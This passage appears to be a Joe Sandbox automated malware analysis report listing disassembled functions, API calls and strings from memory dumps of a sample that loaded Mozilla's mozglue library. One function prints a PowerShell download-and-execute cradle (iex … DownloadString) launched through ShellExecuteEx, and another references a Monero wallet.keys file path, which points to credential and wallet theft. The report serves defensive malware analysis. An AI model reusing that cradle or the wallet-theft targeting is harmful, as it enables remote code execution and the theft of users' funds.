W^l, xrefs: 6C61D5D9, 6C61D63F

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: W^l$|Enabled
API String ID: 4142949111-915038527
Opcode ID: 4487715c4a814cde054025cd2c657e1eb4f1024f5a3b3d6f29fe2a314da3aa24
Instruction ID: 9166a8ce7e57f853fb934c49c5aa08b2538744b571104c3abf6a09c3aecc3ef4
Opcode Fuzzy Hash: 4487715c4a814cde054025cd2c657e1eb4f1024f5a3b3d6f29fe2a314da3aa24
Instruction Fuzzy Hash: 24A104B0A083149FDB16CF69C8D07EEBBF1AF49318F14805CD899ABB41D735A845CBA5

Function 6C631D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C631D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C631BE3,?,?,6C631D96,00000000), ref: 6C631D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C631BE3,?,?,6C631D96,00000000), ref: 6C631D4C
GetCurrentThreadId.KERNEL32 ref: 6C631DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C631DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C631DDA

Part of subcall function 6C631EF0: GetCurrentThreadId.KERNEL32 ref: 6C631F03
Part of subcall function 6C631EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C631DF2,00000000,00000000), ref: 6C631F0C
Part of subcall function 6C631EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C631F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C631DF4

Part of subcall function 6C5FCA10: malloc.MOZGLUE(?), ref: 6C5FCA26

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: f14211b0ca2ad88d8f70e27e528639d75ffaef3f8b8526f20df0de8887aae755
Instruction ID: 5f4bf1f34bb52dd37fe1a1e9d3c6f1a463b4807c2b9d258687f3462e40dea160
Opcode Fuzzy Hash: f14211b0ca2ad88d8f70e27e528639d75ffaef3f8b8526f20df0de8887aae755
Instruction Fuzzy Hash: BE4179B5200700DFCB14CF2AC488A66BBF9FB89354F10542DE99A87B41CB31F854CB99

Function 6C6284E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6284F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C62850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C62851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C62855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C62856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6285AC

Part of subcall function 6C627670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6285B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C62767F
Part of subcall function 6C627670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6285B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C627693
Part of subcall function 6C627670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6285B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6276A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6285B2

Part of subcall function 6C605E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C605EDB
Part of subcall function 6C605E90: memset.VCRUNTIME140(ewdl,000000E5,?), ref: 6C605F27
Part of subcall function 6C605E90: LeaveCriticalSection.KERNEL32(?), ref: 6C605FB2

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: df76ca4d8b24b55d56a1b54d1ed9faebeae990fa3f42c0115c0925db54960531
Instruction ID: 19d9f1bc21ab5ae6d958355af6c683413514d9dc807d64eb664a280742218f8e
Opcode Fuzzy Hash: df76ca4d8b24b55d56a1b54d1ed9faebeae990fa3f42c0115c0925db54960531
Instruction Fuzzy Hash: 0A21BF712006019FDB14DF26C888A6AB7B5BF8830CF14482DE58BD3B41DB39F948CB59

Function 004892E0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(:H,80000000,00000003,00000000,00000003,00000080,00000000,?,00483AEE,?), ref: 004892FC
GetFileSizeEx.KERNEL32(000000FF,:H), ref: 00489319
CloseHandle.KERNEL32(000000FF), ref: 00489327

Strings

:H, xrefs: 00489311, 0048933D, 00489314
:H, xrefs: 004892F8, 004892FB

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: File$CloseCreateHandleSize
String ID: :H$:H
API String ID: 1378416451-2582992418
Opcode ID: bda397af67583db6e3de5d6453b002127e45ac22a63408c4a056109f8d1084e1
Instruction ID: 05ad29bb4ad390bdae663519d14aaaa6481c414137e95920f806c2d03df9155d
Opcode Fuzzy Hash: bda397af67583db6e3de5d6453b002127e45ac22a63408c4a056109f8d1084e1
Instruction Fuzzy Hash: D3F03179E44204BBDB10DFF4DC45B9E77B9AB48710F108654B951A72C0DA749A418B45

Function 6C62F540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C629420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C5F4A68), ref: 6C62945E
Part of subcall function 6C629420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C629470
Part of subcall function 6C629420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C629482
Part of subcall function 6C629420: __Init_thread_footer.LIBCMT ref: 6C62949F

GetCurrentThreadId.KERNEL32 ref: 6C62F559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C62F561

Part of subcall function 6C6294D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6294EE
Part of subcall function 6C6294D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C629508

GetCurrentThreadId.KERNEL32 ref: 6C62F577
AcquireSRWLockExclusive.KERNEL32(6C66F4B8), ref: 6C62F585
ReleaseSRWLockExclusive.KERNEL32(6C66F4B8), ref: 6C62F5A3

Strings

[I %d/%d] profiler_pause_sampling, xrefs: 6C62F3A8
[I %d/%d] profiler_resume_sampling, xrefs: 6C62F499
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C62F56A
[I %d/%d] profiler_resume, xrefs: 6C62F239

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 1e610580f9b1680ada3b498d48f90b846715b57ebc2f1d00eab491582990c8e6
Instruction ID: 5290b8325b0208e20a50c3a8256cc76cba783b8468434278752bff2b8c475da5
Opcode Fuzzy Hash: 1e610580f9b1680ada3b498d48f90b846715b57ebc2f1d00eab491582990c8e6
Instruction Fuzzy Hash: 19F05475700204DBDB006F67D888A7A77BDEFC629DF000415FA0597B02DB7558058B6F

Function 6C6205F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C61CFAE,?,?,?,6C5E31A7), ref: 6C6205FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C61CFAE,?,?,?,6C5E31A7), ref: 6C620616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C5E31A7), ref: 6C62061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C5E31A7), ref: 6C620627

Strings

<jemalloc>, xrefs: 6C6205FA, 6C62060F
: (malloc) Error in VirtualFree(), xrefs: 6C62061B, 6C620625

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 8a53ee27c6697e37beb6d713d746cf1dd03dab8b5dccc77b6e84d1097b787d1b
Instruction ID: ca185ae71f103594c549f8ddfd6a17d7a97145b53270938b4b541b21ac3bba06
Opcode Fuzzy Hash: 8a53ee27c6697e37beb6d713d746cf1dd03dab8b5dccc77b6e84d1097b787d1b
Instruction Fuzzy Hash: 74E08CE2A0101437F6142256AC86DBB7A1CDBCA534F180039FE0E83301E95AAD2E91FB

Function 6C5F05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45a478fca49ca0a23c9b1d726a0c5daf546b00d4fcd33cf77381b95825be0de2
Instruction ID: c5697ce1cbb7ee8ccd3d6a7286567c874ad825f79613c982d6dcb46635f8061c
Opcode Fuzzy Hash: 45a478fca49ca0a23c9b1d726a0c5daf546b00d4fcd33cf77381b95825be0de2
Instruction Fuzzy Hash: 24A16CB0A01645CFDB18CF29C994B99FBF1BF89304F4486AED45A97B01E730A945CF91

Function 6C6414A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6414C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6414E2
GetCurrentThreadId.KERNEL32 ref: 6C641546
InitializeConditionVariable.KERNEL32(?), ref: 6C6415BA
free.MOZGLUE(?), ref: 6C6416B4

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: 20de52815867bd636e59fba9d32e25cc01de10bb2a6c5d0173e22584d8bee615
Instruction ID: 10eaa4462590596c13f12bc76489ee18f71fc505e11d87092d91ad2bbdfa62a1
Opcode Fuzzy Hash: 20de52815867bd636e59fba9d32e25cc01de10bb2a6c5d0173e22584d8bee615
Instruction Fuzzy Hash: 1161E171A007509BDB119F25C880BEEB7B4BF8A308F44951CED8A57701DB31E959CB9A

Function 6C63DC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C63DC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C63D38A,?), ref: 6C63DC6F
free.MOZGLUE(?,?,?,?,?,6C63D38A,?), ref: 6C63DCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C63D38A,?), ref: 6C63DCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C63D38A,?), ref: 6C63DD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C63D38A,?), ref: 6C63DD4A

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 84372bb0c0fa5268cb87f8e15cdd823b1331958076484dc5644164489a7b9385
Instruction ID: cc480706119eab5e19113e4943e3205bc641662fda81cbb6b3f217b64941631e
Opcode Fuzzy Hash: 84372bb0c0fa5268cb87f8e15cdd823b1331958076484dc5644164489a7b9385
Instruction Fuzzy Hash: 6D419FB5A00215CFCB04CF99C98099AB7F9FF89304B156469D949ABB11D731FC01CB98

Function 0048C84E Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

memset.MSVCRT ref: 0048C8BF
___crtGetStringTypeA.LIBCMT ref: 0048C8EC
___crtLCMapStringA.LIBCMT ref: 0048C90C
___crtLCMapStringA.LIBCMT ref: 0048C931

Strings

, xrefs: 0048C896

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: String___crt$Typememset
String ID:
API String ID: 3530896902-3916222277
Opcode ID: dd483d485fd79026bef358b06215a051b2fcedaaee40ac964fc7decdbf5cca2e
Instruction ID: 05f5ec56d346d164a067cf75268c822f2f8319faba790da4a3eebb626fef66bd
Opcode Fuzzy Hash: dd483d485fd79026bef358b06215a051b2fcedaaee40ac964fc7decdbf5cca2e
Instruction Fuzzy Hash: C94118B150075C5EDB21AB248DC4FFF7BE89F05708F1448EEE98A86182D2799A458F78

Function 6C61F440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C61F480

Part of subcall function 6C5EF100: LoadLibraryW.KERNEL32(shell32,?,6C65D020), ref: 6C5EF122
Part of subcall function 6C5EF100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C5EF132

CloseHandle.KERNEL32(00000000), ref: 6C61F555

Part of subcall function 6C5F14B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C5F1248,6C5F1248,?), ref: 6C5F14C9
Part of subcall function 6C5F14B0: memcpy.VCRUNTIME140(?,6C5F1248,00000000,?,6C5F1248,?), ref: 6C5F14EF

Part of subcall function 6C5EEEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C5EEEE3

CreateFileW.KERNEL32 ref: 6C61F4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C61F523

Strings

\oleacc.dll, xrefs: 6C61F4CB

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 82fc9cdd4824f1775fa0847e0d07c205ab297253059a6e2676c3ca65ddae44d0
Instruction ID: 5fd579d08d338a8d422632a9590488c376521c6664e63b160629b23a00f0fae5
Opcode Fuzzy Hash: 82fc9cdd4824f1775fa0847e0d07c205ab297253059a6e2676c3ca65ddae44d0
Instruction Fuzzy Hash: F441AE70608710DFE720DF29C884AABB7F4AF99319F504A1CF59183A50EB70D9598B9B

Function 00482C90 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788

Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01109178,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12

Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982

Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905

ShellExecuteEx.SHELL32(0000003C), ref: 00482D85

Strings

<, xrefs: 00482D39
')", xrefs: 00482CB3
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00482CC4
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00482D04

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
